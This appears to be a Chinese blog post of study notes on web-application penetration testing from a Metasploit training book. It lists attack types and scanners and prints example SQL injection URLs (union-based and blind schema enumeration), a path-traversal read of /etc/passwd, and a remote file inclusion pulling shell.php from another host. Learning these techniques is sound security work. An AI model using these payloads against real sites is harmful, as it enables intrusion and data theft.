《metasploit渗透测试魔鬼训练营》学习笔记第四章—web应用渗透

继续来学习metasploit。。。记好笔记是很重要的,下面开始正文:

二.WEB应用渗透技术

    1.WEB应用渗透基础知识

       先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)

        Sql注入攻击:大致分为 普通注入和盲注

        跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS

        跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求。

        会话认证管理缺陷:验证身份的功能存在缺陷。

        安全误配置:开发和管理人员的失误导致存在漏洞。

        不安全密码存储:密码以明文形式存在或加密算法过于脆弱。

        不安全的对象参考:攻击者利用WEB系统本身的读取功能,任意存取文档,窃取敏感文件。

        限制URL访问失败:没有对私有页面的访问进行身份认证。

        缺乏传输层的保护:没有设置SSL/TLS等保护机制,直接被攻击者窃取敏感数据。

        未验证的重定向和跳转:攻击者通过未验证重定向页面诱使受害者点击,从而窃取受害者敏感数据。

        metasploit关于WEB应用渗透攻击的模块较少,但是kali渗透系统里有很多优秀的WEB渗透工具,弥补了metasploit的不足。

         1.1metasploit的辅助模块

             辅助模块基本都在 modules/auxiliary/,并且在最新的metasploit中内置了wmap WEB扫描器,允许用户配置辅助模块,对网站进行集中扫描。

         1.2渗透模块

              渗透模块分散在module中的多个文件夹下,有针对主流CMS的漏洞,也有针对各种数据库漏洞的模块,同时也包含了成功后用来操作的webshell。

              metasploit与W3AF,SQLMAP,wXf,XSSF,BeFF等WEB漏洞扫描器均有接口,可以更好的进行探测。

2.WEB应用漏洞扫描探测

       2.1.开源WEB应用漏洞扫描工具

             Wapiti:对SQL注入的扫描准确度很高

             W3AF:综合很优秀,都有较高的准确度。

             Sandcat Free Edition:对XSS跨站漏洞准确度很高

       2.2扫描神器W3AF

            W3AF分为八类模块:发现模块(查找HTTP信息,并探测服务器,数据库等信息),审计模块(探测漏洞),搜索模块(捕获信息),攻击模块 (读取扫描信息,并试图通过模块插件攻击),输出模块(输出扫描结果),修改模块(修改信息),入侵模块(绕过入侵检测系统),破解模块(破解需要认证的页面,支持基本认证机制和表单登陆机制的破解)

            具体使用方法不在详解。

       2.3  SQL注入漏洞探测

             sqlmap是一款优秀的SQL注入漏洞的扫描工具。具体用法不再详解。metasploit已经集成了此工具。

       2.4  XSS漏洞探测

            xsser,xssfuzz等工具,或者使用metasploit集成的W3AF。

       2.5  WEB应用程序漏洞探测

            wXf是WEB漏洞扫描和攻击框架,利用metasploit框架的构想。kali中没有集成这个工具,需自行下载。

  3.WEB应用程序渗透测试

       3.1 SQL注入分析

            在这里进行简单的讲解,具体更高级的内容请自己查询

            普通注入:

            http://www.XXX.net/do/plus/view.php?aid=236896'

            //看是否存在注入,若’被过滤,则不能判断。

             http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,2,3,4,5,6,7-- //这里用--注释后边的语句,避免语法错误。该语句是用来判断列数的,若返回错误信息,则证明判断错误,继续加数字进行判断。

               http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,9,10 from 表名--  //得到数据库版本和用户名。

               http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(schema_name),10 from information_schema.SCHEMA--   //查询所有表

                http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(table_name),10 from information_schema.tables where table_schema=database()--   //查询表中所有列

                http://www.XXX.net/do/plus/view.php?aid=236896 and 1=2 union select 1,version(),database(),user(),5,,7,8,group_concat(column_name),10 from information_schema.columns where table_name=列名十六进制--   //查询列中字段

               盲注:这里就只讲解字符的猜解的盲注。

                 http://www.XXX.net/do/plus/view.php?aid=236896 and length(database())>1

                  http://www.XXX.net/do/plus/view.php?aid=236896 and length(database())>2

                 如果第一句没报错,第二句报错了,则证明数据库名是两个字符。以此类推。。

                  http://www.XXX.net/do/plus/view.php?aid=236896 and ascii(substring(database(),1,1))>97

                     http://www.XXX.net/do/plus/view.php?aid=236896 and ascii(substring(database(),1,1))>98

                 如果第一句没报错,第二句报错了,则证明数据库名第一个字符的ASCII码是98,以此类推。。。。

                 http://www.XXX.net/do/plus/view.php?aid=236896 and (select count(table_name) from information_schema where table_schema=database())>15

                 这句是获得数据库表的个数

                 接下来都差不多,不在多述。

          3.2跨站攻击实例分析

               跨站脚本攻击框架(XSSF),具体教程请自行查询。

          3.3命令注入实例分析

               一般流程都是扫描到某应用或者插件的漏洞,然后去上网找关于该漏洞的利用代码进行渗透获取webshell,若能力高超,可以自己编写利用的代码或者把利用的代码自己转换成metasploit的exploit模块和payload模块。具体自行实践,我能力有限。。。将来水平上来了会出教程。。。

          3.4文件包含和文件上传漏洞

              文件包含包括本地文件包含(LFI)和远程文件包含(RFI)。

              http://www.XXX.com/?page=././././etc/passwd   //使用“./”退出当前目录,多试几次

              http://www.XXX.com/?page=www.ooo.com/shell.php    //shell.php是事先在远程主机上准备好的shell。

              文件上传漏洞是由于网站没有经过严格的检查和过滤,可以提交恶意的文件来获取webshell。

        关于绕过上传请自行查询。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Metasploit渗透测试魔鬼训练是一种针对渗透测试人员的培训课程,旨在帮助学员掌握使用Metasploit框架进行渗透测试的技能。该课程包括理论知识和实践操作,涵盖了Metasploit框架的基础知识、漏洞利用、后渗透等内容。通过参加该训练,学员可以提高自己的渗透测试技能,为企业提供更加全面和有效的安全保障。 ### 回答2: Metasploit渗透测试魔鬼训练是一种专注于渗透测试技术的培训计划。Metasploit是一款广泛使用的渗透测试工具,能够帮助安全专业人士评估网络系统的弱点和漏洞,并提供相应的修复方案。Metasploit渗透测试魔鬼训练旨在提供系统性的培训,使学员能够熟练运用Metasploit进行渗透测试,并成为专业的渗透测试人员。 这个魔鬼训练采用实践与理论相结合的教学方法,通过大量的实际案例和模拟演练来帮助学员有效掌握渗透测试技术。训练的内容包括Metasploit的基础知识、常见漏洞的挖掘与利用、渗透测试的方法与策略等。学员将学习如何利用Metasploit对目标网络进行扫描、漏洞利用和漏洞修复,以保证网络安全。 在这个训练中,学员还将接触到实际渗透测试的场景和挑战,通过团队合作来解决复杂的安全问题。这不仅可以提高学员的问题解决能力,还可以培养他们的团队合作精神和沟通能力。 Metasploit渗透测试魔鬼训练适合那些对渗透测试感兴趣,想要提升自己技能的安全专业人员。通过参加这个培训计划,学员可以全面了解Metasploit的功能与应用,并具备进行渗透测试的实际能力。这对于保护网络安全,提高企业的安全性具有重要意义。 ### 回答3: Metasploit是一款著名的渗透测试工具,它被广泛用于评估网络系统的安全性和漏洞。Metasploit渗透测试魔鬼训练是一个专门针对Metasploit工具进行训练和实践的培训班。 这个训练的目的是让参与者全面了解Metasploit的功能和使用方法,并通过实际操作和挑战来提高他们的渗透测试技能。在训练中,学员将学习如何使用Metasploit来发现和利用目标系统中的漏洞,以及如何进行渗透测试和攻击模拟。这些实践活动将使学员更好地理解网络安全漏洞的本质和攻击者的行为方式。 Metasploit渗透测试魔鬼训练学习过程是非常实际的,学员将通过真实情景模拟来进行虚拟网络环境下的渗透测试。他们将学习如何选择和配置适当的漏洞利用模块,如何使用payloads以获取系统访问权限,并了解如何绕过防御机制和检测系统。 这个训练的主要优势之一是培训者具有丰富的经验和专业知识,能够引导学员在实践中掌握Metasploit的各个方面。此外,训练还提供了配套的学习资料和交互环节,使学员能够进一步加强他们的学习效果。 总而言之,Metasploit渗透测试魔鬼训练是一个提供高质量Metasploit培训和实践机会的地方。通过参加这个训练,学员可以提高他们的渗透测试技能,增强他们评估网络安全的能力,并为他们未来的职业发展打下坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值